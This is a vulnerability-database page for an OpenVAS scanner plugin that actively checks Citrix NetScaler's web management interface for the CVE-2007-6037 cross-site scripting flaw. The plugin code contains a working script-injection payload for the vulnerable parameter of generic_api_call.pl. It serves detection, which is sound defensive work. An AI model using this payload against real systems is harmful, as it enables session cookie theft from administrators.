NetScaler Web Management 'CVE-2007-6037' XSS Vulnerability - Active Check
🗓️ 24 Oct 2008 00:00:00Reported by Copyright (C) 2008 nnposterType
openvas🔗 plugins.openvas.org👁 42 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2007-6037 | 20 Nov 200711:00 | – | cve | |
| CVE-2007-6037 | 20 Nov 200711:00 | – | cvelist | |
| Citrix Netscaler 8.0 build 47.8 - Generic_API_Call.pl Cross-Site Scripting | 19 Nov 200700:00 | – | exploitdb | |
| NetScaler Web Management ws/generic_api_call.pl standalone Parameter XSS | 6 Dec 200700:00 | – | nessus | |
| CVE-2007-6037 | 20 Nov 200711:46 | – | nvd | |
| NetScaler web management XSS | 24 Oct 200800:00 | – | openvas | |
| Cross site scripting | 20 Nov 200711:46 | – | prion | |
| Citrix NetScaler Web Management Cookie Weakness | 26 Nov 200700:00 | – | securityvulns | |
| Citrix NetScaler weak cryptography | 26 Nov 200700:00 | – | securityvulns |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/archive/1/483920/100/0/threaded |
| securityfocus | www.securityfocus.com/bid/26491 |
# SPDX-FileCopyrightText: 2008 nnposter
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:citrix:netscaler";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.80027");
script_version("2025-03-11T05:38:16+0000");
script_cve_id("CVE-2007-6037");
script_tag(name:"last_modification", value:"2025-03-11 05:38:16 +0000 (Tue, 11 Mar 2025)");
script_tag(name:"creation_date", value:"2008-10-24 20:15:31 +0200 (Fri, 24 Oct 2008)");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_name("NetScaler Web Management 'CVE-2007-6037' XSS Vulnerability - Active Check");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2008 nnposter");
script_dependencies("gb_citrix_netscaler_consolidation.nasl");
script_mandatory_keys("citrix/netscaler/http/detected");
script_require_ports("Services/www", 80);
script_xref(name:"URL", value:"http://www.securityfocus.com/archive/1/483920/100/0/threaded");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/26491");
script_xref(name:"OSVDB", value:"39009");
script_tag(name:"summary", value:"The remote Citrix NetScaler web management interface is
susceptible to a cross-site scripting (XSS) vulnerability.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_tag(name:"solution", value:"No known solution was made available for at least one year
since the disclosure of this vulnerability. Likely none will be provided anymore. General solution
options are to upgrade to a newer release, disable respective features, remove the product or
replace the product by another one.");
script_tag(name:"qod_type", value:"remote_analysis");
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("host_details.inc");
include("url_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE, service: "www"))
exit(0);
if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
exit(0);
xss = "</script><script>alert(document.cookie)</script><script>";
url = "/ws/generic_api_call.pl?function=statns&standalone=" + urlencode(str: xss);
req = http_get(item: url, port: port);
res = http_keepalive_send_recv(port: port, data: req, embedded: TRUE);
if (!res || xss >!< res)
exit(99);
report = "The following URLs have been found vulnerable :\n\n" +
ereg_replace(string: url, pattern: "\?.*$", replace: "");
security_message(port: port, data: report);
exit(0);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Mar 2025 00:00Current
5.6Medium risk
Vulners AI Score5.6
CVSS 24.3
EPSS0.03579